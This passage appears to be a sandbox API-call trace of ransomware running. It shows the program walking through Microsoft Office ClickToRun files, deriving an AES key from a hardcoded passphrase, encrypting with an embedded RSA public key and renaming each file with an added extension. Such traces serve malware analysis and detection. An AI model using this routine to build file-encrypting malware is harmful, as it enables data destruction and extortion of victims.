lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.597] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.597] GetLastError () returned 0x5 [0235.597] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash")) returned 0x20 [0235.598] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0235.598] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.599] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.599] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.599] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8118) returned 1 [0235.608] CryptCreateHash (in: hProv=0x27e8118, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.608] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.608] CryptHashData (hHash=0x27ebe60, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.608] CryptDeriveKey (in: hProv=0x27e8118, Algid=0x6610, hBaseData=0x27ebe60, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb920) returned 1 [0235.608] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.608] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.608] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8090) returned 1 [0235.611] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8090, dwCertEncodingType=0x1, pInfo=0x2797998*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27979c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27979d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebae0) returned 1 [0235.611] CryptEncrypt (in: hKey=0x27ebae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.611] CryptEncrypt (in: hKey=0x27ebae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e81a0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e81a0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.611] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e81a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.611] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.611] CryptEncrypt (in: hKey=0x27eb920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.612] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.612] CloseHandle (hObject=0xffffffff) returned 1 [0235.612] CloseHandle (hObject=0xffffffff) returned 1 [0235.612] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0235.612] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0235.612] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.gsg")) returned 0 [0235.613] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\s641033.hash.fuck")) returned 0 [0235.613] CryptDestroyHash (hHash=0x27ebe60) returned 1 [0235.613] CryptDestroyKey (hKey=0x27eb920) returned 1 [0235.613] CryptReleaseContext (hProv=0x27e8118, dwFlags=0x0) returned 1 [0235.613] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.613] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.613] GetLastError () returned 0x5 [0235.613] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml")) returned 0x20 [0235.613] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml", dwFileAttributes=0x80) returned 0 [0235.614] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.614] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.614] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.614] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8910) returned 1 [0235.624] CryptCreateHash (in: hProv=0x27e8910, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.624] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.625] CryptHashData (hHash=0x27ebb20, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.625] CryptDeriveKey (in: hProv=0x27e8910, Algid=0x6610, hBaseData=0x27ebb20, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebea0) returned 1 [0235.625] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.625] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.625] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8338) returned 1 [0235.627] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8338, dwCertEncodingType=0x1, pInfo=0x2797a68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797a98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797aa0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebb60) returned 1 [0235.627] CryptEncrypt (in: hKey=0x27ebb60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.628] CryptEncrypt (in: hKey=0x27ebb60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8aa8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8aa8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.628] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8aa8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.628] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.628] CryptEncrypt (in: hKey=0x27ebea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.628] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.628] CloseHandle (hObject=0xffffffff) returned 1 [0235.628] CloseHandle (hObject=0xffffffff) returned 1 [0235.628] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml"), bFailIfExists=0) returned 0 [0235.628] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml", dwFileAttributes=0x0) returned 0 [0235.629] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.gsg")) returned 0 [0235.629] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\Stream.Platform.Culture.man.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.platform.culture.man.xml.fuck")) returned 0 [0235.629] CryptDestroyHash (hHash=0x27ebb20) returned 1 [0235.629] CryptDestroyKey (hKey=0x27ebea0) returned 1 [0235.629] CryptReleaseContext (hProv=0x27e8910, dwFlags=0x0) returned 1 [0235.629] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.630] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.630] GetLastError () returned 0x5 [0235.630] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash")) returned 0x20 [0235.630] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x80) returned 0 [0235.630] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.630] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.631] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.631] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8ee8) returned 1 [0235.640] CryptCreateHash (in: hProv=0x27e8ee8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.640] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.640] CryptHashData (hHash=0x27eb920, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.640] CryptDeriveKey (in: hProv=0x27e8ee8, Algid=0x6610, hBaseData=0x27eb920, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebe60) returned 1 [0235.641] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.641] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.641] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8910) returned 1 [0235.643] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8910, dwCertEncodingType=0x1, pInfo=0x2797c08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797c38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797c40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eb9e0) returned 1 [0235.643] CryptEncrypt (in: hKey=0x27eb9e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.643] CryptEncrypt (in: hKey=0x27eb9e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8228*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8228*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.644] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8228, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.644] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x279d798, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.644] CryptEncrypt (in: hKey=0x27ebe60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x279d798*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.644] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279d798, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.644] CloseHandle (hObject=0xffffffff) returned 1 [0235.644] CloseHandle (hObject=0xffffffff) returned 1 [0235.644] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash"), bFailIfExists=0) returned 0 [0235.644] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x0) returned 0 [0235.645] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.gsg")) returned 0 [0235.645] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.hash.fuck")) returned 0 [0235.645] CryptDestroyHash (hHash=0x27eb920) returned 1 [0235.645] CryptDestroyKey (hKey=0x27ebe60) returned 1 [0235.645] CryptReleaseContext (hProv=0x27e8ee8, dwFlags=0x0) returned 1 [0235.645] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.645] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.646] GetLastError () returned 0x5 [0235.646] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0235.646] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0235.647] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.647] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.647] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\en-us.16\\stream.x64.en-us.man.dat.gsg", 